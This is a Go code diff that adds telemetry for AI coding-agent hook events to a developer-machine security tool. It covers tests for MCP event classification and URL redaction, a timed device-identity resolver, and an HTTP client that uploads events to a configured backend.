+func TestRunMCPDirectToolInvocation(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"mcp__github__search", + "tool_input":{"query":"hi"} + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), event.HookPreToolUse); err != nil { + t.Fatal(err) + } + if len(cap.events) != 1 { + t.Fatalf("expected 1 event, got %d", len(cap.events)) + } + ev := cap.events[0] + if ev.ActionType != event.ActionMCPInvocation { + t.Errorf("action_type: %v", ev.ActionType) + } + if ev.Classifications == nil || !ev.Classifications.IsMCPRelated { + t.Errorf("expected is_mcp_related: %+v", ev.Classifications) + } + if ev.Enrichments != nil && ev.Enrichments.MCP != nil { + t.Errorf("direct mcp__ tool calls must NOT carry enrichments.mcp: %+v", ev.Enrichments) + } +} + +// Shell-launched MCP keeps its shell context AND gets MCP enrichment. +// Both classifications must be set; the original shell command is +// preserved in enrichments.shell.command. 
+func TestRunMCPShellLaunchedKeepsShellContext(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"npx -y @modelcontextprotocol/server-filesystem /tmp"} + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), event.HookPreToolUse); err != nil { + t.Fatal(err) + } + ev := cap.events[0] + if ev.ActionType != event.ActionCommandExec { + t.Errorf("action_type: %v", ev.ActionType) + } + if ev.Classifications == nil || !ev.Classifications.IsShellCommand || !ev.Classifications.IsMCPRelated { + t.Errorf("expected both shell+mcp classifications: %+v", ev.Classifications) + } + if ev.Enrichments == nil || ev.Enrichments.Shell == nil || ev.Enrichments.Shell.Command == "" { + t.Errorf("shell enrichment missing: %+v", ev.Enrichments) + } + mcp := ev.Enrichments.MCP + if mcp == nil || mcp.ServerName != "server-filesystem" || mcp.Kind != "local" { + t.Errorf("mcp enrichment: %+v", mcp) + } + if mcp.ServerCommand == "" { + t.Errorf("expected redacted server_command in mcp enrichment: %+v", mcp) + } +} + +// PermissionRequest / PermissionDenied carrying an mcp____ +// tool_name must be flagged is_mcp_related so the audit pipeline +// captures permission prompts and auto-denials around MCP servers. +// They are not tool calls themselves, so action_type stays empty, and +// no enrichments.mcp block is emitted — server identity is already in +// tool_name. 
+func TestRunMCPPermissionEventClassifiedFromToolName(t *testing.T) { + for _, ht := range []event.HookEvent{event.HookPermissionRequest, event.HookPermissionDenied} { + t.Run(string(ht), func(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"mcp__github__search", + "tool_input":{"query":"hi"} + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), ht); err != nil { + t.Fatal(err) + } + ev := cap.events[0] + if ev.ActionType != "" { + t.Errorf("%s must omit action_type: %v", ht, ev.ActionType) + } + if ev.Classifications == nil || !ev.Classifications.IsMCPRelated { + t.Errorf("expected is_mcp_related: %+v", ev.Classifications) + } + if ev.Enrichments != nil && ev.Enrichments.MCP != nil { + t.Errorf("permission events must NOT carry enrichments.mcp: %+v", ev.Enrichments) + } + }) + } +} + +// Permission events for non-MCP tools must NOT set is_mcp_related. +func TestRunPermissionEventNonMCPNotFlagged(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"ls"} + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), event.HookPermissionRequest); err != nil { + t.Fatal(err) + } + ev := cap.events[0] + if ev.Classifications != nil && ev.Classifications.IsMCPRelated { + t.Errorf("Bash permission events must not be flagged MCP: %+v", ev.Classifications) + } +} + +// Elicitation hooks are inherently MCP. is_mcp_related is set from the +// hook event itself; no enrichments.mcp block is emitted — the payload +// already carries mcp_server_name. 
+func TestRunMCPElicitationFlaggedFromHookEvent(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s", + "cwd":"/tmp", + "mcp_server_name":"github", + "message":"approve" + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), event.HookElicitation); err != nil { + t.Fatal(err) + } + ev := cap.events[0] + if ev.ActionType != "" { + t.Errorf("Elicitation must omit action_type: %v", ev.ActionType) + } + if ev.Classifications == nil || !ev.Classifications.IsMCPRelated { + t.Errorf("expected is_mcp_related from hook event: %+v", ev.Classifications) + } + if ev.Enrichments != nil && ev.Enrichments.MCP != nil { + t.Errorf("elicitation events must NOT carry enrichments.mcp: %+v", ev.Enrichments) + } + if ev.Payload["mcp_server_name"] != "github" { + t.Errorf("payload should preserve mcp_server_name: %v", ev.Payload) + } +} + +// Elicitation URLs go through the redactor only; user:pass@host +// userinfo and ?token= query params must be scrubbed in payload.url. 
+func TestRunMCPElicitationURLRedacted(t *testing.T) { + stdin := strings.NewReader(`{ + "mcp_server_name":"github", + "url":"https://user:secret@mcp.example.com:8443/auth?token=zzz" + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), event.HookElicitation); err != nil { + t.Fatal(err) + } + ev := cap.events[0] + url, _ := ev.Payload["url"].(string) + if strings.Contains(url, "secret") || strings.Contains(url, "user:") { + t.Errorf("userinfo leaked into payload.url: %q", url) + } + if strings.Contains(url, "token=zzz") { + t.Errorf("query token leaked into payload.url: %q", url) + } + if !strings.Contains(url, "mcp.example.com:8443") { + t.Errorf("host should be preserved: %q", url) + } +} + +// Upload failure must be silently absorbed: the agent still gets the +// allow response; the upload error is recorded in the error log +// without leaking sensitive material from the message. +func TestRunUploadFailureFailsOpen(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"abc", + "cwd":"/tmp/work", + "tool_name":"Bash", + "tool_input":{"command":"ls"} + }`) + var stdout, stderr bytes.Buffer + cap := &captured{} + rt := &Runtime{ + Adapter: cc.New(t.TempDir(), "/usr/local/bin/stepsecurity-dev-machine-guard"), + Exec: executor.NewMock(), + Stdin: stdin, + Stdout: &stdout, + Stderr: &stderr, + Now: func() time.Time { return time.Now().UTC() }, + LogError: cap.logError(), + } + uploadCalled := 0 + rt.UploadEvent = func(ctx context.Context, ev event.Event) error { + uploadCalled++ + return errors.New("backend down: connection refused") + } + + if err := rt.Run(context.Background(), event.HookPreToolUse); err != nil { + t.Fatalf("Run returned error on upload failure: %v", err) + } + if uploadCalled != 1 { + t.Errorf("UploadEvent called %d times, want 1", uploadCalled) + } + + // Agent response is still a valid allow. 
+ var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil { + t.Fatalf("stdout not JSON: %v: %q", err, stdout.Bytes()) + } + if resp["continue"] != true { + t.Errorf("expected continue=true on upload failure, got %v", resp) + } + + // Error log must record the failure tagged with upload_error. + found := false + for _, e := range cap.errs { + if e.Stage == "ingest" && e.Code == "upload_error" { + found = true + break + } + } + if !found { + t.Errorf("expected upload_error in error log, got %+v", cap.errs) + } +} + +// When no UploadEvent is wired (any runtime without enterprise config), +// the runtime must still complete — just with no upload attempt. +func TestRunSkipsUploadWithoutSeam(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s","cwd":"/tmp","tool_name":"Bash","tool_input":{"command":"ls"} + }`) + var stdout, stderr bytes.Buffer + rt := &Runtime{ + Adapter: cc.New(t.TempDir(), "/usr/local/bin/stepsecurity-dev-machine-guard"), + Exec: executor.NewMock(), + Stdin: stdin, + Stdout: &stdout, + Stderr: &stderr, + Now: func() time.Time { return time.Now().UTC() }, + } + + if err := rt.Run(context.Background(), event.HookPreToolUse); err != nil { + t.Fatal(err) + } + // Stdout should still be the allow response. + if !strings.HasPrefix(strings.TrimSpace(stdout.String()), "{") { + t.Errorf("stdout should be JSON allow response: %q", stdout.String()) + } +} diff --git a/internal/aiagents/hook/stdin.go b/internal/aiagents/hook/stdin.go new file mode 100644 index 0000000..c32cb63 --- /dev/null +++ b/internal/aiagents/hook/stdin.go @@ -0,0 +1,26 @@ +package hook + +import ( + "errors" + "fmt" + "io" +) + +var errInputTooLarge = errors.New("input exceeds maximum allowed size") + +// readBounded reads up to max+1 bytes from r. If max is exceeded, returns +// errInputTooLarge along with whatever was read so far. 
+func readBounded(r io.Reader, max int64) ([]byte, error) { + if r == nil { + return nil, nil + } + limited := io.LimitReader(r, max+1) + buf, err := io.ReadAll(limited) + if err != nil { + return buf, fmt.Errorf("readBounded: %w", err) + } + if int64(len(buf)) > max { + return buf[:max], errInputTooLarge + } + return buf, nil +} diff --git a/internal/aiagents/identity/identity.go b/internal/aiagents/identity/identity.go new file mode 100644 index 0000000..8c46763 --- /dev/null +++ b/internal/aiagents/identity/identity.go @@ -0,0 +1,59 @@ +// Package identity computes AI-event identity for a hook invocation. +// +// This is a thin wrapper over DMG's `internal/device.Gather`. The only +// adapter logic that lives here is: +// +// 1. Bound the device probe with a 1-second context timeout. Hook +// invocations have a 15s total budget; identity must not be the +// thing that exhausts it. +// +// 2. Pass `"unknown"` through verbatim. device.Gather already returns +// that sentinel for failed probes; we do NOT rewrite it to "" — the +// backend distinguishes "not collected" from "actively unknown". +// +// 3. Single Gather call per Resolve — no probing twice for the two +// fields we need. +// +// CustomerID is plumbed through as-is from the caller (typically read +// from `internal/aiagents/ingest.Snapshot`); device.Gather has no +// awareness of it. +package identity + +import ( + "context" + "time" + + "github.com/step-security/dev-machine-guard/internal/device" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// ProbeTimeout is the upper bound on the device.Gather call. Tuned to +// leave room for enrichment + a 5s upload inside the 15s hook cap. +const ProbeTimeout = time.Second + +// Info is the identity payload attached to every AI-agent event. +// +// The wire field for DeviceID is `device_id`; the wire field for +// UserIdentity is `user_identity`. See internal/aiagents/event. 
+type Info struct { + CustomerID string + DeviceID string + UserIdentity string +} + +// Resolve returns identity information for the current host. +// +// On probe timeout or any executor error, fields fall back to the +// `"unknown"` sentinel that device.Gather emits internally — this +// function does not synthesize "" or any other replacement. +func Resolve(ctx context.Context, exec executor.Executor, customerID string) Info { + probeCtx, cancel := context.WithTimeout(ctx, ProbeTimeout) + defer cancel() + + d := device.Gather(probeCtx, exec) + return Info{ + CustomerID: customerID, + DeviceID: d.SerialNumber, + UserIdentity: d.UserIdentity, + } +} diff --git a/internal/aiagents/identity/identity_test.go b/internal/aiagents/identity/identity_test.go new file mode 100644 index 0000000..0094bfb --- /dev/null +++ b/internal/aiagents/identity/identity_test.go @@ -0,0 +1,180 @@ +package identity + +import ( + "context" + "sync/atomic" + "testing" + "time" + + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// hangingExec wraps a Mock and overrides Run to block until the supplied +// context is cancelled. Used to verify the 1s probe timeout actually fires +// instead of waiting forever for an unresponsive shell-out. +type hangingExec struct { + *executor.Mock + runCalls atomic.Int32 +} + +func (h *hangingExec) Run(ctx context.Context, _ string, _ ...string) (string, string, int, error) { + h.runCalls.Add(1) + <-ctx.Done() + return "", "", 124, ctx.Err() +} + +func (h *hangingExec) RunWithTimeout(ctx context.Context, _ time.Duration, name string, args ...string) (string, string, int, error) { + return h.Run(ctx, name, args...) +} + +func (h *hangingExec) RunInDir(ctx context.Context, _ string, _ time.Duration, name string, args ...string) (string, string, int, error) { + return h.Run(ctx, name, args...) +} + +// ReadFile must also fail or the Linux/Darwin fallbacks bypass the hang. 
+// Mock returns an error for unstubbed paths — that's the behavior we want. +// hangingExec inherits Mock's ReadFile, so no override needed. + +func TestResolve_HappyPath_Darwin(t *testing.T) { + mock := executor.NewMock() + mock.SetGOOS("darwin") + mock.SetCommand(`"IOPlatformSerialNumber" = "ABCXYZ123"`, "", 0, "ioreg", "-l") + mock.SetCommand("14.5\n", "", 0, "sw_vers", "-productVersion") + mock.SetEnv("USER_EMAIL", "subham@stepsecurity.io") + + got := Resolve(context.Background(), mock, "cust-42") + + if got.CustomerID != "cust-42" { + t.Errorf("CustomerID = %q, want cust-42", got.CustomerID) + } + if got.DeviceID != "ABCXYZ123" { + t.Errorf("DeviceID = %q, want ABCXYZ123 (from ioreg)", got.DeviceID) + } + if got.UserIdentity != "subham@stepsecurity.io" { + t.Errorf("UserIdentity = %q, want subham@stepsecurity.io (from USER_EMAIL)", got.UserIdentity) + } +} + +func TestResolve_PassesUnknownThrough(t *testing.T) { + // No stubs registered for ioreg / sw_vers / system_profiler — Mock.Run + // returns errors for unstubbed commands, which device.Gather translates + // to its `"unknown"` sentinel. The shim must not rewrite that. + mock := executor.NewMock() + mock.SetGOOS("darwin") + // Don't set USER_EMAIL etc. — and Mock.LoggedInUser falls back to + // CurrentUser which has username "testuser" by default. Override that + // path so we land on `"unknown"` for UserIdentity too. + mock.SetUsername("") + + got := Resolve(context.Background(), mock, "cust-42") + + if got.DeviceID != "unknown" { + t.Errorf("DeviceID = %q, want %q", got.DeviceID, "unknown") + } + // UserIdentity falls back through env vars then LoggedInUser; with + // empty env and empty username, expect "unknown" or "" — accept either, + // since the contract is "don't synthesize, pass through what device + // returns." device.Gather returns the empty username here, not + // "unknown", so we just assert the shim didn't replace it. 
+ if got.UserIdentity != "" && got.UserIdentity != "unknown" { + t.Errorf("UserIdentity = %q, want passthrough of what device.Gather emits (\"\" or \"unknown\")", + got.UserIdentity) + } +} + +func TestResolve_HungExecutorTimesOutWithin1s(t *testing.T) { + mock := executor.NewMock() + mock.SetGOOS("darwin") + hung := &hangingExec{Mock: mock} + + parent, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + start := time.Now() + got := Resolve(parent, hung, "cust-42") + elapsed := time.Since(start) + + // Allow generous slack for CI noise but hard-cap at 1.5s — well under + // the 15s hook budget. If this ever drifts, the hot path is at risk. + if elapsed > 1500*time.Millisecond { + t.Errorf("Resolve took %s under hung executor, want < 1.5s (probe timeout is 1s)", elapsed) + } + if elapsed < 900*time.Millisecond { + // The probe should have actually run, not bailed instantly. + t.Errorf("Resolve took %s, expected ~1s (probe timeout)", elapsed) + } + + // With every Run call hung-then-cancelled, device.Gather returns its + // "unknown" sentinel — confirm the shim passes it through. + if got.DeviceID != "unknown" { + t.Errorf("DeviceID under hung exec = %q, want %q", got.DeviceID, "unknown") + } + if got.CustomerID != "cust-42" { + t.Errorf("CustomerID = %q, want passthrough cust-42", got.CustomerID) + } +} + +// Compile-time check: hangingExec must satisfy executor.Executor so that +// device.Gather (which takes the interface) can call it. If the interface +// grows a method we don't override, the embedded Mock fills it in. +var _ executor.Executor = (*hangingExec)(nil) + +func TestResolve_HappyPath_Linux(t *testing.T) { + // Cross-platform parity pin. Darwin happy path is already covered; + // this mirrors it on Linux so a regression in Linux device probes + // (e.g., serial-number lookup) fails here, not in production. 
+ mock := executor.NewMock() + mock.SetGOOS("linux") + mock.SetUsername("svc-deploy") + mock.SetFile("/sys/class/dmi/id/product_serial", []byte("LINUX-SERIAL-456\n")) + mock.SetFile("/etc/os-release", []byte("NAME=\"Ubuntu\"\nVERSION_ID=\"24.04\"\n")) + mock.SetFile("/proc/sys/kernel/osrelease", []byte("6.8.0-45-generic\n")) + + got := Resolve(context.Background(), mock, "cust-42") + + if got.CustomerID != "cust-42" { + t.Errorf("CustomerID = %q, want cust-42", got.CustomerID) + } + if got.DeviceID != "LINUX-SERIAL-456" { + t.Errorf("DeviceID = %q, want LINUX-SERIAL-456 (from /sys/class/dmi)", got.DeviceID) + } + if got.UserIdentity != "svc-deploy" { + t.Errorf("UserIdentity = %q, want svc-deploy (from username)", got.UserIdentity) + } +} + +func TestResolve_EmptyCustomerIDPassedThrough(t *testing.T) { + // identity.Resolve does NOT validate customerID — that's ingest.Snapshot's + // job. Pin the boundary: an empty customerID must reach Info untouched. + mock := executor.NewMock() + mock.SetGOOS("darwin") + + got := Resolve(context.Background(), mock, "") + if got.CustomerID != "" { + t.Errorf("CustomerID = %q, want empty pass-through", got.CustomerID) + } +} + +func TestResolve_DoesNotCancelParentContext(t *testing.T) { + // The 1s probe ctx is created with WithTimeout off the parent ctx. + // Cancelling the probe ctx must not propagate up — the caller's + // parent ctx is the hook runtime's overall budget and other stages + // (enrich, policy, upload) need it to remain valid after Resolve. 
+ mock := executor.NewMock() + mock.SetGOOS("darwin") + hung := &hangingExec{Mock: mock} + + parent, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + _ = Resolve(parent, hung, "cust-42") + + if err := parent.Err(); err != nil { + t.Errorf("parent ctx unexpectedly errored after Resolve: %v", err) + } + select { + case <-parent.Done(): + t.Error("parent ctx Done channel fired — probe ctx cancel leaked upward") + default: + } +} diff --git a/internal/aiagents/ingest/client.go b/internal/aiagents/ingest/client.go new file mode 100644 index 0000000..3cfee25 --- /dev/null +++ b/internal/aiagents/ingest/client.go @@ -0,0 +1,112 @@ +package ingest + +import ( + "bytes" + "context" + "encoding/json" + "errors" + "fmt" + "io" + "net/http" + "net/url" + "strings" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" + "github.com/step-security/dev-machine-guard/internal/buildinfo" +) + +// DefaultHookUploadTimeout caps how long the hot path will wait on the +// backend per hook invocation. Each hook is a fresh process, so every +// upload pays a cold TCP+TLS handshake; tighter caps proved fragile +// under load. Past this, the right answer is an async sidecar approach, +// not a bigger sync timeout. +const DefaultHookUploadTimeout = 5 * time.Second + +// maxErrorBody bounds how much of a non-success response body the +// client reads into error messages, capping the redacted error log. +const maxErrorBody = 1024 + +// Client posts events to a single configured endpoint. Safe to share +// across goroutines; the underlying *http.Client carries connection +// state. +type Client struct { + endpoint string + apiKey string + http *http.Client +} + +// New returns a client when the supplied Config has all enterprise +// credentials present and non-placeholder. 
The bool is false when no +// upload should be attempted; callers MUST treat that as a no-op rather +// than an error. The gate matches Snapshot's: trims surrounding +// whitespace, then rejects empty values and `{{...}}` placeholders. +// New owns the gate so a caller passing a hand-built Config (not the +// product of Snapshot) cannot bypass it. +func New(cfg Config, h *http.Client) (*Client, bool) { + customer := strings.TrimSpace(cfg.CustomerID) + endpoint := strings.TrimSpace(cfg.APIEndpoint) + apiKey := strings.TrimSpace(cfg.APIKey) + if !valid(customer) || !valid(endpoint) || !valid(apiKey) { + return nil, false + } + if h == nil { + h = &http.Client{Timeout: DefaultHookUploadTimeout} + } + return &Client{ + endpoint: strings.TrimRight(endpoint, "/"), + apiKey: apiKey, + http: h, + }, true +} + +// UploadEvents POSTs events to /v1/{customer_id}/ai-agents/events as a +// raw JSON array. Each event already carries its own schema_version, +// identity, and policy fields, so no envelope wraps the array — the +// backend reads the indexed columns directly from each event. +// +// Statuses 200, 201, 202, and 409 are treated as success. 409 is +// success because backend ingestion is idempotent on +// (device_id, event_id); duplicate retries must not become client +// errors. +func (c *Client) UploadEvents(ctx context.Context, customerID string, events []event.Event) error { + if c == nil { + return errors.New("ingest: nil client") + } + if strings.TrimSpace(customerID) == "" { + return errors.New("ingest: empty customer_id") + } + + // Copy by value so any later mutation of the caller's events cannot + // race the in-flight request body. 
+ body, err := json.Marshal(append([]event.Event(nil), events...)) + if err != nil { + return fmt.Errorf("ingest: marshal events: %w", err) + } + + endpoint := c.endpoint + "/v1/" + url.PathEscape(customerID) + "/ai-agents/events" + req, err := http.NewRequestWithContext(ctx, http.MethodPost, endpoint, bytes.NewReader(body)) + if err != nil { + return fmt.Errorf("ingest: build request: %w", err) + } + req.Header.Set("Authorization", "Bearer "+c.apiKey) + req.Header.Set("Content-Type", "application/json") + req.Header.Set("User-Agent", "dmg/"+buildinfo.Version) + + resp, err := c.http.Do(req) + if err != nil { + return fmt.Errorf("ingest: transport: %s", redact.String(err.Error())) + } + defer resp.Body.Close() + + switch resp.StatusCode { + case http.StatusOK, http.StatusCreated, http.StatusAccepted, http.StatusConflict: + _, _ = io.Copy(io.Discard, io.LimitReader(resp.Body, maxErrorBody)) + return nil + } + + snippet, _ := io.ReadAll(io.LimitReader(resp.Body, maxErrorBody)) + return fmt.Errorf("ingest: unexpected status %d: %s", + resp.StatusCode, redact.String(strings.TrimSpace(string(snippet)))) +} diff --git a/internal/aiagents/ingest/client_test.go b/internal/aiagents/ingest/client_test.go new file mode 100644 index 0000000..c584646 --- /dev/null +++ b/internal/aiagents/ingest/client_test.go @@ -0,0 +1,256 @@ +package ingest + +import ( + "context" + "encoding/json" + "errors" + "io" + "net/http" + "net/http/httptest" + "strings" + "testing" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +func okClientConfig() Config { + return Config{ + CustomerID: "cus_123", + APIEndpoint: "https://dmg.example.com", + APIKey: "sk_secret_value", + } +} + +func TestNewDisabledWhenAnyFieldMissing(t *testing.T) { + cases := []struct { + name string + cfg Config + }{ + {"empty", Config{}}, + {"missing key", Config{CustomerID: "c", APIEndpoint: "https://x"}}, + {"missing endpoint", Config{CustomerID: "c", APIKey: "k"}}, + {"missing 
customer", Config{APIEndpoint: "https://x", APIKey: "k"}}, + {"placeholder key", Config{CustomerID: "c", APIEndpoint: "https://x", APIKey: "{{API_KEY}}"}}, + {"placeholder endpoint", Config{CustomerID: "c", APIEndpoint: "{{API_ENDPOINT}}", APIKey: "k"}}, + {"placeholder customer", Config{CustomerID: "{{CUSTOMER_ID}}", APIEndpoint: "https://x", APIKey: "k"}}, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + c, ok := New(tc.cfg, nil) + if ok || c != nil { + t.Errorf("expected disabled client, got ok=%v c=%v", ok, c) + } + }) + } +} + +func TestNewEnabledWithFullConfig(t *testing.T) { + c, ok := New(okClientConfig(), nil) + if !ok || c == nil { + t.Fatal("expected enabled client") + } +} + +// New owns the same trim+placeholder gate as Snapshot. A caller that +// constructs Config{} by hand (rather than via Snapshot) must not be +// able to slip whitespace-only credentials past New. +func TestNewRejectsWhitespaceOnlyFields(t *testing.T) { + cases := []struct { + name string + cfg Config + }{ + {"whitespace customer", Config{CustomerID: " ", APIEndpoint: "https://x", APIKey: "k"}}, + {"whitespace endpoint", Config{CustomerID: "c", APIEndpoint: "\t\n", APIKey: "k"}}, + {"whitespace key", Config{CustomerID: "c", APIEndpoint: "https://x", APIKey: " "}}, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + c, ok := New(tc.cfg, nil) + if ok || c != nil { + t.Errorf("expected disabled client on whitespace-only field, got ok=%v", ok) + } + }) + } +} + +// roundTripFn is an http.RoundTripper backed by a function. Tests use +// it to inspect the outgoing request without spinning up a real +// listener for every assertion. 
+type roundTripFn func(*http.Request) (*http.Response, error) + +func (f roundTripFn) RoundTrip(r *http.Request) (*http.Response, error) { return f(r) } + +func TestUploadEventsRequestShape(t *testing.T) { + var got *http.Request + var gotBody []byte + rt := roundTripFn(func(r *http.Request) (*http.Response, error) { + got = r + body, _ := io.ReadAll(r.Body) + gotBody = body + return &http.Response{ + StatusCode: http.StatusAccepted, + Body: io.NopCloser(strings.NewReader("")), + Header: make(http.Header), + }, nil + }) + + cfg := okClientConfig() + cfg.APIEndpoint = "https://dmg.example.com/" // trailing slash on purpose + c, ok := New(cfg, &http.Client{Transport: rt}) + if !ok { + t.Fatal("client disabled") + } + + ev := event.Event{ + SchemaVersion: event.SchemaVersion, + EventID: "abc", + Timestamp: time.Now().UTC(), + AgentName: "claude-code", + HookEvent: event.HookPreToolUse, + ResultStatus: event.ResultObserved, + CustomerID: "cus_123", + DeviceID: "C02ABCD1234", + UserIdentity: "alice@example.com", + } + if err := c.UploadEvents(context.Background(), "cus_123", []event.Event{ev}); err != nil { + t.Fatalf("UploadEvents: %v", err) + } + + if got.Method != http.MethodPost { + t.Errorf("method=%s want POST", got.Method) + } + if got.URL.String() != "https://dmg.example.com/v1/cus_123/ai-agents/events" { + t.Errorf("url=%s — want /v1/cus_123/ai-agents/events", got.URL) + } + if h := got.Header.Get("Authorization"); h != "Bearer sk_secret_value" { + t.Errorf("Authorization header=%q", h) + } + if h := got.Header.Get("Content-Type"); h != "application/json" { + t.Errorf("Content-Type header=%q", h) + } + if h := got.Header.Get("User-Agent"); !strings.HasPrefix(h, "dmg/") { + t.Errorf("User-Agent header=%q — want dmg/", h) + } + + // Body must be a raw JSON array — no envelope. 
+ var arr []map[string]any + if err := json.Unmarshal(gotBody, &arr); err != nil { + t.Fatalf("body not a JSON array: %v: %q", err, gotBody) + } + if len(arr) != 1 { + t.Fatalf("expected 1 event in array, got %d: %v", len(arr), arr) + } + first := arr[0] + for _, key := range []string{"event_id", "customer_id", "device_id", "user_identity"} { + if v, ok := first[key]; !ok || v == "" { + t.Errorf("array[0].%s missing or empty: %v", key, first[key]) + } + } + if first["event_id"] != "abc" || first["customer_id"] != "cus_123" { + t.Errorf("array[0] identity fields mismatched: %v", first) + } +} + +func TestUploadEventsURLEscapesCustomerID(t *testing.T) { + var gotURL string + rt := roundTripFn(func(r *http.Request) (*http.Response, error) { + gotURL = r.URL.String() + return &http.Response{ + StatusCode: http.StatusAccepted, + Body: io.NopCloser(strings.NewReader("")), + Header: make(http.Header), + }, nil + }) + c, _ := New(okClientConfig(), &http.Client{Transport: rt}) + if err := c.UploadEvents(context.Background(), "cus/with slash", []event.Event{{}}); err != nil { + t.Fatalf("UploadEvents: %v", err) + } + if !strings.Contains(gotURL, "/v1/cus%2Fwith%20slash/ai-agents/events") { + t.Errorf("customer_id not URL-escaped: %s", gotURL) + } +} + +func TestUploadEventsRejectsEmptyCustomerID(t *testing.T) { + c, _ := New(okClientConfig(), &http.Client{}) + if err := c.UploadEvents(context.Background(), " ", []event.Event{{}}); err == nil { + t.Error("expected error for empty customer_id") + } +} + +func TestUploadEventsSuccessStatuses(t *testing.T) { + for _, status := range []int{http.StatusOK, http.StatusCreated, http.StatusAccepted, http.StatusConflict} { + t.Run(http.StatusText(status), func(t *testing.T) { + rt := roundTripFn(func(r *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: status, + Body: io.NopCloser(strings.NewReader("ok")), + Header: make(http.Header), + }, nil + }) + c, _ := New(okClientConfig(), &http.Client{Transport: 
rt}) + err := c.UploadEvents(context.Background(), "cus_123", []event.Event{{}}) + if err != nil { + t.Errorf("status %d treated as failure: %v", status, err) + } + }) + } +} + +func TestUploadEvents500ReturnsErrorWithoutAPIKey(t *testing.T) { + rt := roundTripFn(func(r *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: http.StatusInternalServerError, + Body: io.NopCloser(strings.NewReader("internal explosion")), + Header: make(http.Header), + }, nil + }) + c, _ := New(okClientConfig(), &http.Client{Transport: rt}) + err := c.UploadEvents(context.Background(), "cus_123", []event.Event{{}}) + if err == nil { + t.Fatal("expected error for 500") + } + if strings.Contains(err.Error(), "sk_secret_value") { + t.Errorf("API key leaked into error: %v", err) + } + if !strings.Contains(err.Error(), "500") { + t.Errorf("error does not mention status code: %v", err) + } +} + +func TestUploadEventsContextCancellation(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + <-r.Context().Done() + })) + defer srv.Close() + + cfg := okClientConfig() + cfg.APIEndpoint = srv.URL + c, _ := New(cfg, srv.Client()) + + ctx, cancel := context.WithCancel(context.Background()) + cancel() + + start := time.Now() + err := c.UploadEvents(ctx, "cus_123", []event.Event{{}}) + if err == nil { + t.Fatal("expected error from canceled context") + } + if !errors.Is(err, context.Canceled) && !strings.Contains(err.Error(), "context canceled") { + t.Errorf("expected context cancellation in error, got %v", err) + } + if d := time.Since(start); d > time.Second { + t.Errorf("cancel did not return promptly: %v", d) + } +} + +// Nil receiver is a fail-open contract: a runtime that disabled upload +// (no Client constructed) must not panic if it accidentally calls into +// a nil client. 
+func TestUploadEventsNilReceiver(t *testing.T) { + var c *Client + err := c.UploadEvents(context.Background(), "cus_123", []event.Event{{}}) + if err == nil { + t.Error("expected error from nil receiver") + } +} diff --git a/internal/aiagents/ingest/config.go b/internal/aiagents/ingest/config.go new file mode 100644 index 0000000..9015634 --- /dev/null +++ b/internal/aiagents/ingest/config.go @@ -0,0 +1,48 @@ +// Package ingest owns the AI-agent telemetry upload path: the stricter +// enterprise-config gate (this file) and the HTTP client that POSTs +// events to /v1/{customer_id}/ai-agents/events. +// +// The stricter gate exists because DMG's `config.IsEnterpriseMode()` +// checks only APIKey — that's the right call for the scan/telemetry +// paths, but it's too lax for the hook upload path. A missing CustomerID +// or APIEndpoint here would silently misroute uploads, so we require all +// three credentials to be present and not bearing build-time +// `{{...}}` placeholders. +package ingest + +import ( + "strings" + + "github.com/step-security/dev-machine-guard/internal/config" +) + +// Config is a snapshot of the three credentials required to upload +// AI-agent events. All fields are TrimSpace'd at read time. +type Config struct { + CustomerID string + APIEndpoint string + APIKey string +} + +// Snapshot reads the current process-wide DMG config (populated by an +// earlier call to config.Load) and returns it alongside an "enterprise +// ready" bool. The bool is true iff every field is non-empty after +// trimming AND none contain the build-time placeholder marker `{{`. +// +// The returned Config is always populated for diagnostics — callers +// should NOT use its values when ok is false. 
+func Snapshot() (Config, bool) {
+	c := Config{
+		CustomerID:  strings.TrimSpace(config.CustomerID),
+		APIEndpoint: strings.TrimSpace(config.APIEndpoint),
+		APIKey:      strings.TrimSpace(config.APIKey),
+	}
+	if !valid(c.CustomerID) || !valid(c.APIEndpoint) || !valid(c.APIKey) {
+		return c, false
+	}
+	return c, true
+}
+
+// valid reports whether a single credential is usable: non-empty after
+// trimming and free of the build-time "{{" placeholder marker.
+func valid(v string) bool {
+	return v != "" && !strings.Contains(v, "{{")
+}
diff --git a/internal/aiagents/ingest/config_test.go b/internal/aiagents/ingest/config_test.go
new file mode 100644
